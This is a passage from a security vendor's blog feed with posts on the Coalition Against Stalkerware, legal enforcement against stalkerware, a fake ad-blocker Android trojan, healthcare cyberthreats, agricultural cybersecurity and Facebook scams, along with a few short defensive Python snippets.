In the past quarter, we’ve observed sustained malvertising activity and a diversity of malware payloads served. We can probably expect this trend to continue, and perhaps even see new frameworks pop up. And even though the possibility remains remote, we can’t discount an exploit kit targeting one of the newer browsers.

Consumer and enterprise users still running Internet Explorer are protected from these exploit kits with Malwarebytes.

The post Exploit kits: fall 2019 review appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Malwarebytes teams up with security vendors and advocacy groups to launch Coalition Against Stalkerware

Malwarebytes - Tue, 11/19/2019 - 13:00

Today, Malwarebytes is announcing its participation in a joint effort to stop invasive digital surveillance: the Coalition Against Stalkerware.

For years, Malwarebytes has detected and warned users about the potentially dangerous capabilities of stalkerware, an invasive threat that can rob individuals of their expectation of, and right to, privacy. Just like the domestic abuse it can enable, stalkerware also proliferates away from public view, leaving its victims and survivors in isolation, unheard and unhelped.

The Coalition Against Stalkerware is the next necessary step in stopping this digital threat—a collaborative approach steered by the promise of enabling the safe use of technology for everyone, everywhere. The coalition includes representatives from cybersecurity vendors, domestic violence organizations, and the digital rights space.

Our coalition’s founding members are Malwarebytes, Avira, Kaspersky, G Data, Norton Lifelock, National Network to End Domestic Violence, Electronic Frontier Foundation, Operation Safe Escape, WEISSER Ring, and the European Network for the Work with Perpetrators of Domestic Violence. Martijn Grooten, editor of Virus Bulletin, is serving as a special advisor.

Already, the coalition has produced results.

In the past month, both Malwarebytes and Kaspersky shared research and intelligence on stalkerware with one another. This exchange has improved the detection rate for both our products, but more than that, it has improved the safety of users everywhere.

Further, coalition members have taken on the task of defining stalkerware and creating its detection criteria, crucial steps in empowering the cybersecurity industry to better understand this threat and how to fight it.

Finally, the coalition’s website includes information for domestic abuse survivors and advocates, including links to external resources, information about state laws, recent news articles, and survivors’ stories.

With this group, we are making a call to the broader cybersecurity industry: If you have ever made a promise to protect people, now is the time to uphold that promise. Stalkerware is a known, documented threat, and you can help stop it.

Join our fight. You’ll be in good company.

Our journey against invasive monitoring apps

In 2019, Malwarebytes began a recommitment to detecting and stopping apps that could invasively monitor users without their knowledge. These types of programs, which we classify as “monitor” or “spyware” in our product, can provide domestic abusers with a new avenue of control over their survivors’ lives, granting wrongful, unfettered access to text messages, phone calls, emails, GPS location data, and online browsing behavior.

In this effort, we’ve analyzed more than 2,500 samples of programs that had been flagged in research algorithms as potential monitoring/tracking apps or spyware. We grew our database of known monitoring/spying apps to include more than 100 applications that no other vendor detects and more than 10 that were, as of October 1, still on the Google Play Store.

Further, we’ve written multiple blogs for domestic abuse survivors and advocates on what to do if they have these types of apps on their phones, how to protect against them, and how organizations supporting victims of stalking can secure their data. In the summer, we also offered cybersecurity advice to domestic abuse advocates and survivors for the National Network to End Domestic Violence’s Technology Summit in San Francisco.

We are proud of our work, but we cannot ignore an important fact—it was not conducted in isolation.

Our blogs relied on the expertise of several domestic abuse advocates, along with the published work of researchers in intimate partner violence and digital rights. Our invitations to local community justice centers were as much about presenting as they were about learning. Our meetings with local law enforcement taught us about difficulties in collecting evidence of these invasive apps, and how domestic abusers can slip through the cracks of legal enforcement.

Every time we reached out, we learned more and we improved. With the Coalition Against Stalkerware, we hope to deepen these efforts.

The post Malwarebytes teams up with security vendors and advocacy groups to launch Coalition Against Stalkerware appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (November 11 – 17)

Malwarebytes - Mon, 11/18/2019 - 16:43

Last week on Malwarebytes Labs, we offered statistics and information on a sneaky new Trojan malware for Android, inspected a bevy of current Facebook scams, and explained the importance of securing food and agriculture infrastructure.

We also released our latest report on cybercrime tactics and techniques, offering new telemetry about the many cybersecurity threats facing the healthcare industry. You can read the full report here.

Other cybersecurity news

Stay safe, everyone!

The post A week in security (November 11 – 17) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Stalkerware’s legal enforcement problem

Malwarebytes - Mon, 11/18/2019 - 15:47

Content warning: This piece contains brief descriptions of domestic violence and assault against women and children.

In the past five years, only two stalkerware developers, both of whom designed, marketed, and sold tools favored by domestic abusers to pry into victims’ private lives, have faced federal consequences for their actions. Following a guilty plea in court, one was ordered to pay $500,000, and his app was subsequently shut down. The other was ordered to change his apps if he wanted to keep selling them.

The dearth of meaningful legal enforcement against stalkerware makers extends to another realm—stalkerware users. Those who install stalkerware with the intent to monitor, control, harass, or otherwise abuse their victims typically get away with it, avoiding legal penalty even if there’s plenty of evidence to suggest their guilt.

To blame is a frustrating yet human struggle that includes low awareness, police mistrust, limited law enforcement resources, scant data, furtive advertising schemes, and a criminal justice system that must rely on currently-available statutes—some decades old—to bring charges against alleged criminals who utilize a modern, evolving cyberthreat.

This is stalkerware’s legal enforcement problem. The invasive cyberthreat can be installed on unsuspecting users’ mobile devices to gain access to their text messages, emails, call logs, browser activity, GPS location, and even their microphone and camera. It is entangled deeply in cases of stalking, harassment, and assault—then muddied by its relationship with cybercrime and technology abuse, two little-understood and vastly under-resourced areas of criminal justice.   

Erica Olsen, director of the Safety Net program at the National Network to End Domestic Violence (NNEDV), summed up the difficulties.

“There’s generally a lack of motivation on this issue and a consistent minimization of this type of abuse,” Olsen said. “That’s complicated further when the numbers on this type of abuse are hard to track, since many people are going the route of a factory reset or a new device, and because police either don’t have access to the forensic software to test, are unwilling to use it in these cases, or survivors don’t want to.”

She continued: “That can make it seem like this isn’t happening as much as it is.” 

Large problem, limited action

In October, the US Federal Trade Commission (FTC) became the latest government body to launch a new front against stalkerware.

Following an investigation into the company Retina-X Studios and its owner, James N. Johns Jr., the FTC said it found multiple violations of the Children’s Online Privacy Protection Act (COPPA) and the Federal Trade Commission Act, which prohibits businesses from deceiving their customers. The FTC’s consent agreement told a story of broken data security promises, repeated data breaches, user privacy invasions, and compromised device security.

Per the agreement with the FTC, Retina-X and Johns Jr. can no longer develop, promote, or advertise their apps—PhoneSheriff, MobileSpy, and TeenSafe—unless significant changes are made to the apps’ designs and functionalities. The same restrictions apply to any stalkerware-type app that the company and its founder work on in the future. Because of limitations of the FTC Act, the FTC could not issue a fine to Retina-X and Johns Jr. for their first violation.

At the time of the settlement agreement, Electronic Frontier Foundation Cybersecurity Director Eva Galperin, a staunch advocate against stalkerware, told Business Insider: “I’ll take what I can get.”

The problem, Galperin said, is that the FTC’s settlement only precluded Retina-X and Johns Jr. from working on stalkerware apps that were not for “legitimate” purposes—an inherently flawed premise.

“There are simply no legitimate purposes for secret stalking apps,” Galperin wrote together with EFF Associate Director of Research Gennie Gebhart.

The FTC’s settlement represented a change in enforcement, though—it was the first federal action against a stalkerware maker in five years.

In 2014, the FBI indicted a man who allegedly conspired to sell and advertise the stalkerware app StealthGenie, which could, without a user’s consent, monitor their text messages and phone calls, and peer into their online browsing behavior. The man, who was then 31 years old, pleaded guilty to the charges and received a $500,000 fine. A US District Judge later permanently shut down StealthGenie’s operations.

When Malwarebytes reached out to the FBI to better understand how it is tracking stalkerware, a spokesperson said that the bureau’s Internet Crime Complaint Center, which receives complaints about app-related crimes, has not received many complaints about stalkerware itself. The spokesperson said that stalkerware could be part of complaints being made in other categories, though, like personal data breach or malware-related activities.

Though five years apart, the actions by the FBI and the FTC bear a striking similarity. The allegations against the two stalkerware developers dealt with the economics of stalkerware—selling, marketing, promoting, and advertising.

Upon the FBI’s successful prosecution of StealthGenie’s owner, then-Assistant Attorney General Leslie Caldwell affirmed this focus:

“Make no mistake: Selling spyware is a federal crime, and the Criminal Division will make a federal case out of it.”

But sometimes, the federal crime of selling stalkerware is not enough to catch everyone who makes it, said NNEDV’s Olsen.

“If you look at the language and discussion of the StealthGenie app conviction, it was all about the marketing and the product that they were selling,” Olsen said. Unfortunately, countless stalkerware developers have changed their marketing tactics to position their products as more “family-focused” parental monitoring apps, but with the exact same, non-consensual spying capabilities. These slapdash marketing changes make it difficult for government agencies to actually catch and stop stalkerware developers, Olsen said.

“That change in their marketing makes it harder to hold them accountable because they can claim they are not responsible for people misusing or manipulating their product, but that their product is not meant to be used for illegal activity,” Olsen said.

What to do, then, if developers have faced few consequences, and an easy escape route—retooled advertising—is readily available? Easy, Olsen said. Go after the criminal users.

“If they can’t go after them for that,” Olsen said, “then the accountability has to be on the person who knowingly misused it for a criminal purpose.”

Stalkerware’s illegal uses

The legal effort to stop stalkerware users is an uphill battle. Much of that is because stalkerware itself, and the ownership of it, is not a crime.

Instead, it is how stalkerware is used that could violate various state and federal laws. Unfortunately, many of its use cases are grim, tied often into cases of domestic violence, sexual harassment, and assault.

Danielle Citron, professor of law at Boston University School of Law, wrote about stalkerware-leveraged domestic violence in her 2015 paper “Spying Inc.”

“A woman fled her abuser who was living in Kansas. Because her abuser had installed a cyber stalking app on her phone, her abuser knew that she had moved to Elgin, Illinois. He tracked her to a shelter and then a friend’s home where he assaulted her and tried to strangle her. In another case, a woman tried to escape her abusive husband, but because he had installed a stalking app on her phone, he was able to track down her and her children. The man murdered his two children. In 2013, a California man, using a spyware app, tracked a woman to her friend’s house and assaulted her.”

When stalkerware isn’t directly tied to violence, it can still be used in several ways that break multiple federal and state laws.

For example, a domestic abuser in California who uses stalkerware to record their partner’s phone calls without their knowledge could be violating California Penal Code 632(a), which forbids recording a phone conversation without all parties consenting, along with the federal Wiretap Act. A domestic abuser in New York who uses stalkerware to track a survivor’s movements through GPS tracking could be in violation of New York state’s “Jackie’s Law.” And a domestic abuser who jailbreaks someone’s phone to install stalkerware onto the device could be in violation of the federal Computer Fraud and Abuse Act, a broad law that WhatsApp has claimed was violated by the Israeli spyware maker NSO Group.

Quite obviously, though, stalkerware use is most often bundled into complaints of stalking, cyberstalking, and online harassment—statutes that cover a gamut of illegal behavior including intimidation, harassment, and bullying that happen in real life or online.

But even when the US government receives cases that outline these crimes, the actual, successful prosecution against the alleged criminals is rare, according to data obtained by ThinkProgress.

In 2017, ThinkProgress reported that the US Department of Justice frequently failed to prosecute cyberstalking and online harassment cases from 2012 to 2016. During that time period, US Attorneys’ offices prosecuted 321 cases of online harassment and stalking, which included 41 cases for cyberstalking. Of those 41 cases, 21 resulted in convictions.

The numbers betray the reported volume of cyberstalking that was happening at the time.

According to 2016 data from the Data & Society Research Institute and the Center for Innovative Public Health Research, an astonishing 8 percent of all US Internet users had been cyberstalked at some time in their lives. Further, 14 percent of Internet users under the age of 30 reported they’d been cyberstalked, which included 20 percent of women under 30.

ThinkProgress wrote that the data it collected is not ironclad. The data represented cases in which cyberstalking or online harassment were the first charge listed in an indictment. Also, because of how the federal statute on cyberstalking is written, the prosecutions include cases in which stalking happened through more physical means, like through a phone or through the mail.

Still, when ThinkProgress showed its data to Citron, she remarked: “That’s pathetic.”

Mary Anne Franks, professor of law at the University of Miami School of Law and vice-president of the Cyber Civil Rights Initiative, echoed Citron’s statements.

“Anecdotally, we’ve definitely heard that law enforcement generally, and the FBI in particular, is not interested in the vast majority of cases,” Franks told the outlet.

The FBI, however, only investigates crimes with a federal nexus, and quite often, the potential crimes committed in tandem with the use of stalkerware break state laws, which are to be investigated by local police.

There, different obstacles arise.

Local breakdown

As we’ve seen, the federal response to stalkerware—and to cyberstalking and online harassment—is limited. Researchers claim that US Attorneys are uninterested in prosecuting charges of cyberstalking and online harassment, and federal agencies, like the FBI and FTC, have jurisdictional limits to their investigations.

But what about at the state level, where victims can work with local police, who in turn can obtain evidence of illegal behavior, and then recommend charges and prosecution to a county’s District Attorney office?

When looking at how local law enforcement agencies respond to crimes in which stalkerware could play a role, human struggles emerge, said Maureen Curtis, vice president for the criminal justice and court programs for Operation Safe Horizon. Some of those struggles include: both victim and local law enforcement not understanding how stalkerware could be used in stalking situations, difficulty in collecting strong evidence of cyberstalking, and fear that contacting the police will make the situation worse.

Curtis has worked with the New York Police Department to train countless officers on domestic violence victim safety, offender accountability, housing options, and the criminal justice response to domestic violence. She said that her office has seen a shift in stalking behavior, from a previously physical crime to one today that includes text messages, GPS tracking, and calls made from spoofed phone numbers.

It is, she said, much more “invisible,” which makes it much harder to track and much harder to find evidence on. 

“When I think about domestic violence and sexual assault and the way the criminal justice responds, there are still crimes where the onus is on the victim to show they’re a victim—definitely with stalking,” Curtis said. “It can be very difficult, particularly now, when it’s more hidden and survivors don’t have the understanding of it—it leads to them not having the evidence they feel they need.”

But even when evidence is recorded, Curtis said, the reporting of this type of behavior depends on a tenuous relationship between domestic violence survivors and the police who patrol their communities.

“Some survivors don’t want criminal prosecution—they want the [violence] to stop, and they might think that contacting the police will escalate [the situation],” Curtis said. She said that many survivors also have to consider the consequences of having their abuser arrested or sent to prison.

“If the [abuser] is an immigrant, they could be deported. If they’re working, they could lose their job,” Curtis said. She said the concerns pile up for communities of color, too. “Here in New York City, if I’m a woman of color, I may be afraid of calling the police because I’m afraid what might happen to my partner. Or I fear that, if I have children, and I call the police, they may call the child welfare authority and now I have another system involved in my life.”

Unfortunately, the frustrations can continue when a survivor decides to work with law enforcement to attempt to bring charges against an individual, Curtis said, because police can recommend charges be made, but they’re not the ones to actually prosecute. That job falls to local district attorneys.

“The police can get frustrated because, even if they write someone up, the district attorney may not feel there’s enough evidence, so the police get declined prosecution, which frustrates the police department,” Curtis said. “It’s a vicious cycle.”

What to do?

In 2015, then-Democratic Senator Al Franken reintroduced a federal bill to ban the development, use, and sale of GPS-stalking apps, creating a potential legislative solution to both the creation and use of some types of stalkerware.

At the time, Sen. Franken stressed the bewildering fact that many of the apps that enabled illegal activity were, themselves, not illegal.

“[The legislation] will help a whole range of people affected by cyberstalking, including survivors of domestic violence, and it would finally outlaw unconscionable—but perfectly legal—smartphone apps that allow abusers to secretly track their victims,” Sen. Franken said.

Introduced in the Senate, the bill was referred to the Judiciary Committee, where it stalled.  

When asked if federal legislation was the right path forward to solving the many issues in catching stalkerware abusers, cyberstalkers, and online harassers, Curtis said that new laws might help, but she had separate advice: Get the industry to do its part.

Years ago, Curtis’ office had an arrangement with Verizon, she said, in which Operation Safe Horizon could work with the phone provider to get a domestic abuse survivor’s phone number changed, free of charge. She also pointed to a free event at the New York City Family Justice Center, happening this year, in which Cornell University researchers are offering a “digital privacy check-up,” which includes a scan for “spyware.”

She said cybersecurity vendors could learn from that.

“I would imagine that, if there’s a way of putting malware onto a device, the people who really understand the tech can find it and get rid of it,” Curtis said.

She stressed that any company that wants to help must remember to provide its services for free, as many domestic violence survivors suffer from limited resources. The best part about companies getting involved, Curtis said, is that it provides an entirely new, separate avenue for relief:

“It will work whether you want to involve the criminal justice system or not.”

The post Stalkerware’s legal enforcement problem appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Stealthy new Android malware poses as ad blocker, serves up ads instead

Malwarebytes - Thu, 11/14/2019 - 19:51

Since its discovery less than a month ago, a new Trojan malware for Android we detect as Android/Trojan.FakeAdsBlock has already been seen on over 500 devices, and it’s on the rise. This nasty piece of mobile malware cleverly hides itself on Android devices while serving up a host of advertisements: full-page ads, ads delivered when opening the default browser, ads in the notifications, and even ads via home screen widget. All while, ironically, posing as an ad blocker vaguely named Ads Blocker.

Upon installation: trouble

Diving right into this mobile threat, let’s look at its ease of infection. Immediately upon installation, it asks for Allow display over other apps rights.

This is, of course, so it can display all the ads it serves.

After that, the app opens and asks for a Connection request to “set up a VPN connection that allows it to monitor network traffic.” Establishing a VPN connection is not unusual for an ad blocker, so why wouldn’t you click OK? 

To clarify, the app doesn’t actually connect to any VPN. Instead, clicking OK allows the malware to run in the background at all times.

Next up is a request to add a home screen widget.

This is where things get suspicious. The added widget is nowhere to be found. On my test device, it added the widget to a new home screen page.  Good luck finding and/or clicking it though.

The fake ad blocker then outputs some jargon to make it look legit.

Take a good look, because this will most likely be the last time you’ll see this supposed ad blocker if you are one of the many unfortunate victims of its infection.

Extreme stealth

Ads Blocker is inordinately hard to find on the mobile device once installed. To start, there is no icon for Ads Blocker. However, there are some hints of its existence, for example, a small key icon in the status bar.

This key icon was created after accepting the fake VPN connection message, as shown above. As a result, this small key is proof that the malware is running in the background.

Although hard to spot, another clue is a blank white notification box hidden in plain sight.

Warning: If you happen to press this blank notification, it will ask permission to Install unknown apps with a toggle button to Allow from this source. In this case, the source is the malware, and clicking on it could allow for the capability to install even more malware.

If you try to find Ads Blocker on the App info page on your mobile device to remove manually, it once again hides itself with a blank white box.

Luckily, it can’t hide the app storage used, so the floating 6.57 MB figure shown above can assist in finding it. Unless you spot this app storage number and figure out which app it belongs to (by process of elimination), you won’t be able to remove Ads Blocker from your device.
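That process of elimination can be scripted. Below is a hedged sketch, not a removal tool: it assumes you’ve already captured the output of `adb shell pm list packages -3` (third-party packages) and, separately, the set of packages that expose a launcher activity. All package names in the example are invented; a third-party app with no launcher entry isn’t proof of malware, just worth a closer look.

```python
# Hedged sketch: approximate the "process of elimination" with captured adb
# output. Assumes you already have:
#   adb shell pm list packages -3   -> third-party packages
#   (plus, gathered separately, the packages that expose a launcher activity)
# All package names below are invented examples, not real detections.

def parse_packages(pm_output: str) -> set:
    """Turn 'package:com.example.app' lines into a set of package names."""
    return {line.split(":", 1)[1].strip()
            for line in pm_output.splitlines()
            if line.startswith("package:")}

def iconless_packages(installed: set, launchable: set) -> set:
    """Installed third-party packages with no launcher icon."""
    return installed - launchable

pm_out = "package:com.example.notes\npackage:com.example.hidden\n"
installed = parse_packages(pm_out)
launchable = {"com.example.notes"}
print(sorted(iconless_packages(installed, launchable)))  # ['com.example.hidden']
```

Anything flagged this way still needs manual confirmation, since some legitimate apps (keyboards, services) also ship without a launcher icon.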

Android malware digs in its fangs

This Android malware is absolutely relentless in its ad-serving capabilities and frequency. As a matter of fact, while writing this blog, it served up numerous ads on my test device at a frequency of about once every couple minutes. In addition, the ads were displayed using a variety of different methods.

For instance, it starts with the basic full-page ad:

In addition, it offers ads in the notifications:

Oh look, it wants to send ads through the default web browser:

Last, remember the request to add a widget to the home screen that seemed to be invisible? Invisible widget presents: even more ads.

The ads themselves cover a wide variety of content, and some are quite unsavory—certainly not what you want to see on your mobile device.

Infections on the rise

Needless to say, this stealthy Android malware that plasters users with vulgar ads is not what folks are looking for when they download an ad blocker. Unfortunately, we have already counted over 500 detections of Android/Trojan.FakeAdsBlock. Moreover, we collected over 1,800 samples in our Mobile Intelligence System of FakeAdsBlock, leading us to believe that infection rates are quite high. On the positive side, Malwarebytes for Android removed more than 500 infections that are otherwise exceedingly difficult to remove manually.

Source of infection

It is unclear exactly where this Android malware is coming from. The most compelling evidence we have is based on VirusTotal submission data, which suggests the infection is spreading in the United States. Most likely, users are downloading the app from third-party app store(s) looking for a legitimate ad blocker, but are unknowingly installing this malware instead.

Moreover, from the filenames of several submissions, such as Hulk (2003).apk, Guardians of the Galaxy.apk, and Joker (2019).apk, there’s also a connection with a bogus movie app store as another possible source of infection.

Additional evidence demonstrates the Android malware might also be spreading in European countries such as France and Germany. A forum post was created on the French version of regarding Ads Blocker, and a German filename was submitted to VirusTotal. 

A new breed of mobile malware

A new breed of stealthy mobile malware is clearly on the uptick. Back in August, we wrote about the hidden mobile malware xHelper, which we detect as Android/Trojan.Dropper.xHelper. At that time, xHelper had already been removed from 33,000 mobile devices—and the numbers continue to grow. Ads Blocker is even more stealthy and could easily reach the same rate of infection.

You can call it shameless plugging if you like, but this trend of stealthy Android malware highlights the necessity of a good mobile anti-malware scanner, like Malwarebytes. With more and more users turning to their mobile phones for banking, shopping, storing health data, emailing, and other sensitive, yet important functions, protecting against mobile malware has become paramount. Beware of third-party app stores, yes, but have backup in case apps like Ads Blocker have you fooled.

Stay safe out there!

The post Stealthy new Android malware poses as ad blocker, serves up ads instead appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Labs report finds cyberthreats against healthcare increasing while security circles the drain

Malwarebytes - Wed, 11/13/2019 - 13:00

The team at Malwarebytes Labs is at it again, this time with a special edition of our quarterly CTNT report—Cybercrime tactics and techniques: the 2019 state of healthcare. Over the last year, we gathered global data from our product telemetry, honeypots, threat intelligence, and research efforts, focusing on the top threat categories and families that plagued the medical industry, as well as the most common attack vectors used by cybercriminals to penetrate healthcare defenses.

What we found is that healthcare-targeted cybercrime is a growing sector, with threats increasing in volume and severity while highly-valuable patient data remains unguarded. With a combination of unsecured electronic healthcare records (EHR) spread over a broad attack surface, cybercriminals are cashing in on industry negligence, exploiting vulnerabilities in unpatched legacy software and social engineering unaware hospital staff into opening malicious emails—inviting infections into the very halls constructed to beat them.

Our report explores the security challenges inherent to all healthcare organizations, from small private practices to enterprise HMOs, as well as the devastating consequences of criminal infiltration on patient care. Finally, we look ahead to innovations in biotech and the need to consider security in their design and implementation.

Key takeaways: the 2019 state of healthcare

Some of the key takeaways from our report:

  • The medical sector is currently ranked as the seventh-most targeted global industry according to Malwarebytes telemetry gathered from October 2018 through September 2019.
  • Threat detections have increased for this vertical from about 14,000 healthcare-facing endpoint detections in Q2 2019 to more than 20,000 in Q3, a growth rate of 45 percent.
  • The medical industry is overwhelmingly targeted by Trojan malware, which increased by 82 percent in Q3 2019 over the previous quarter.
  • While Emotet detections surged at the beginning of 2019, TrickBot took over in the second half as the number one threat to healthcare today.
  • The healthcare industry is a target for cybercriminals for several reasons, including their large databases of EHRs, lack of sophisticated security model, and high number of endpoints and other devices connected to the network.
  • Consequences of a breach for the medical industry far outweigh any other organization, as stolen or modified patient data can put a stop to critical procedures, and devices locked out due to ransomware attack can result in halted operations—and sometimes even patient death.
  • New innovations in biotech, including cloud-based biometrics, genetic research, and even advances in prosthetics could broaden the attack surface on healthcare and result in far-reaching, dire outcomes if security isn’t baked into their design and implementation.

To learn more about the cyberthreats facing healthcare and our recommendations for improving the industry’s security posture, read the full report:

Cybercrime tactics and techniques: the 2019 state of healthcare

The post Labs report finds cyberthreats against healthcare increasing while security circles the drain appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Vital infrastructure: securing our food and agriculture

Malwarebytes - Tue, 11/12/2019 - 20:06

I don’t expect to hear any arguments on whether the production of our food is important or not. So why do we hardly ever hear anything about the cybersecurity in the food and agriculture sector?

Depending on the country, agriculture makes up about 5 percent of the gross domestic product. That percentage is even bigger in less industrial countries. That amounts to a lot of money. And that’s just agriculture. For every farmer, 10 others are employed in related food businesses.

In fact, the food and agriculture sector is made up of many different contributors—from farmers to restaurants to supermarkets and almost every imaginable step in between. They range in size from a single sheepherder to multinational corporations like Bayer and Monsanto.

With a growing population and a diminishing amount of space for agriculture, the sector has grown to rely on more advanced techniques to meet the growing demands for agricultural products. And these techniques rely on secure technology to function.

Precision agriculture

Precision agriculture is an advanced form of agriculture, and as such, it uses a lot of connected technology. This basically puts it in the same risk category as household IoT devices. When looking at these devices from a security standpoint, it doesn’t matter a whole lot whether you are dealing with a web printer or a milking machine.

The connected technologies that are in use in agriculture mostly rely on remote sensing, global positioning systems, and communication systems to generate big data, analytics, and machine learning.

The main threats to this type of technology are denial-of-service attacks and data theft. With limited availability of bandwidth in some rural areas, communication loss may be caused by factors other than a cyberattack—which makes it all the more important to have something to fall back on.

Data protection and data recovery are different entities but so closely related that solutions need to account for both. Data protection mostly comes down to management tools, encryption, and access control. Recovery requires backups or roll-back technology, which is easy to deploy and the backups require the same protection as the original data.
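As one small illustration of the recovery side, a checksum stored alongside each backup lets you detect corruption or tampering before a restore. This is only a sketch using Python’s stdlib hashlib; the sensor snapshot is a made-up example, and real deployments would also encrypt and access-control the data as described above.

```python
import hashlib

def checksum(data: bytes) -> str:
    """SHA-256 digest of a backup blob, stored alongside the backup."""
    return hashlib.sha256(data).hexdigest()

def verify(data: bytes, expected: str) -> bool:
    """Recompute and compare before trusting a restore."""
    return hashlib.sha256(data).hexdigest() == expected

# Made-up sensor snapshot standing in for a real backup file.
snapshot = b"field-7,moisture=0.31,2019-11-12T06:00Z"
digest = checksum(snapshot)
print(verify(snapshot, digest))                # True
print(verify(snapshot + b"tampered", digest))  # False
```

A plain hash guards against corruption; pairing it with a keyed HMAC or signature would also guard against an attacker who can rewrite both the backup and its checksum.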

Supply chain

The supply chain for our food is variable, ranging from farmer’s supplies to the supermarket where we buy our food. Depending on the type of food, the chain can be extremely short (farm-to-table) or quite long. You may find a pharmaceutical giant like Bayer as a supplier for a farmer, but also as a manufacturer that gets its raw materials from farmers. Recently, Bayer was the victim of a cyberattack, which was likely aimed at industrial espionage.

Given the sensitive nature of the food supply chain which directly influences our health and happiness, it is only natural that we want to control the security of every step in the process. In order to do so, we look at suppliers other than those of physical goods and systems.

Financial institutions, for example, are heavily invested in agriculture, since it is one of the largest verticals. Back in 2012, a hacking group installed a Remote Access Trojan (RAT) on the computer of an insurance agent and used it to gain access to and steal reports and documents related to sales agents, as well as thousands of sent and received emails and passwords from Farmers Insurance.

Traceability across the supply chain is increasingly in demand by the public and sellers of the end-products. They want to know not only where the ingredients or produce came from, but when the crop was harvested and how they were grown and treated before they ended up on stores’ shelves.

Physical protection

Besides disrupting the industry supply chain, cyberattacks could potentially be used to harm consumers or the environment. An outbreak of a disease and the consequent fear of contamination could devastate a food processor or distributor.

Given the number of producers and their spread across the country, a nationwide attack as an act of war or terrorism seems farfetched. But sometimes undermining the trust of the population in the quality of certain products can serve as a method to spread unrest and insecurity.

We have seen such attacks against supermarkets where a threat actor threatens to poison a product unless the owner pays up. In Germany, for example, a man slipped a potentially lethal poison into baby food on sale in some German supermarkets in an extortion scheme aimed at raising millions of Euros.

In Mexico, a drug cartel used government information about one of the most lucrative crops, avocado, to calculate how much “protection money” they could ask of its farmers, implying they would kidnap family members if they didn’t pay.

Cybersecurity for food

In the food and agriculture sector, cybersecurity has never been a prominent point of attention. But you can expect the technology used in precision agriculture to become a target of cybercriminals, especially if resources become more precious. Whether they would hold a system hostage until the farmer pays or whether they would abuse connected devices in a DDoS attack, cybercriminals could take advantage of lax security measures if the industry doesn’t sit up and take notice.

The use of big data to enhance production and revenue makes sense, but with the use of big data comes the risk of data corruption or theft.

Meanwhile, the food and agriculture sector operates in chains and depends on other chain organizations and third parties. What is true for any chain is that it is only as strong as its weakest link, which in this case tends to be single farmers or small businesses. And as in most sectors, budgets of small businesses are tight, and cybersecurity sits somewhere near the bottom of the spending list, even though an attack on expensive farming equipment could be costly, not to mention a ransomware-style attack shutting a company down for a while.

You’ve got that backwards

Because the farming equipment industry has no problem forcing farmers to have their maintenance done by authorized dealers, farmers have resorted to installing firmware of questionable origin on their tractors to avoid paying top dollar for repairs and maintenance. This opens up a whole new avenue for cybercriminals to get their malware installed by the victims themselves. Apparently, all you have to do is offer it up as John Deere firmware on an online forum. You can even get paid for selling the software and then collect a ransom to get the tractor operational again as a bonus.


While farmers are renowned for cooperating when buying and selling goods, and for exchanging information about illnesses and diseases, there is no such initiative when it comes to sharing information about cyberthreats and how to thwart them. Setting up such an initiative might be a first step in the right direction.

In our society, being able to trace a product or its ingredients back to their origin is becoming more important. Implementing that traceability could be an ideal moment to couple it with data security.

As with household IoT devices, manufacturers should be held accountable for providing an acceptable level of security in their products, or at least the ability to configure one: no hardcoded credentials, no hard-to-change passwords, and no weak default security settings.

Stay safe everyone!

The post Vital infrastructure: securing our food and agriculture appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Facebook scams: Bad ads, bogus grants, and fake tickets lurk on social media giant

Malwarebytes - Mon, 11/11/2019 - 18:27

We recently highlighted new steps Instagram is taking to try and clamp down on scammers sending fake messages on their platform. It turns out, other social media giants are walking a similar path for a variety of bogus ads and other attacks. Facebook scams in particular have taken off, despite the company’s efforts to stamp them out.

Facebook is now extending a rollout of their bogus ad reporting tool to Australia, after a variety of popular Australian celebrities kept appearing in fake ads. Regular readers may remember the genesis of this reporting tool being a similar incident in the UK involving popular consumer advice expert Martin Lewis.

Facebook’s ad reporting tool will allow Australian users to flag dodgy investment schemes or hard-to-cancel product trials—this alongside the corporation’s claims to have already shut down some 2.2 billion fake accounts worldwide.

While this is certainly welcome news for users of the social media platform, there’s still an awful lot of bad ads currently in circulation outside of these fake offers and adverts. Below, we’ll lead you through some of the more popular and current Facebook scams, such as efforts to hijack your social media account, swipe personal information, and of course, part you from your money.

Rogue ad campaigns

Scammers will happily compromise social media accounts, and then use them to purchase thousands of dollars of ad space before they can be shut down. In the examples given, one victim only had the ad campaign shut down because his credit card expired—else he feared he’d have been hit by $10,000 in credit card debt. Another had adverts running for about $1,550 per day until notified by PayPal. Ironically, one of the victims runs a business focused on privacy-themed adverts.

Some of the bogus ads listed certain items at a cheap price to make it look as though it had to be a pricing error of some sort. This is a common tactic going back many years, but the twist here is that the landing pages contained credit card skimmers so anyone paying up for a bargain had their payment details swiped instead.

Concert ticket fakeouts

Facebook is a popular place for some social event wheeling and dealing, especially in dedicated groups and fan pages. It turns out fake messages advertising non-existent tickets are also, sadly, quite popular.

Here’s how it works: Facebook scammers wait for an event coming up; the smaller, the better to fly under the radar. At this point, they cut and paste the same bogus “I have free tickets but I can’t make it” message and wait for the replies to come flooding in. They’ll list the typical reasons why they can’t go: “I’m out of town,” “I’m undergoing surgery,” or “there’s a family emergency.”

If you spend enough time digging around, you’ll likely see the same cut and paste missive posted by multiple, supposedly independent accounts. One quick dubious money transfer later and you’ll be out of pocket with no tickets to show for it. Keeping track of event organiser pages when looking for tickets is a must to ensure you don’t fall for the same scam.
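That “same cut and paste missive” pattern is easy to spot programmatically. The sketch below, with invented sample posts and account names, normalizes each message and groups posts by fingerprint, so an identical pitch from supposedly independent accounts stands out even when punctuation or capitalization differs slightly.

```python
import re
from collections import defaultdict

def fingerprint(text: str) -> str:
    """Normalize case, punctuation, and spacing so trivial edits still match."""
    text = re.sub(r"[^a-z0-9\s]", "", text.lower())
    return re.sub(r"\s+", " ", text).strip()

def duplicate_posters(posts):
    """posts: (account, message) pairs; return fingerprints used by 2+ accounts."""
    seen = defaultdict(set)
    for account, message in posts:
        seen[fingerprint(message)].add(account)
    return {fp: accounts for fp, accounts in seen.items() if len(accounts) > 1}

# Invented examples: two "independent" accounts posting the same pitch.
posts = [
    ("alice92", "I have free tickets but I can't make it -- DM me!"),
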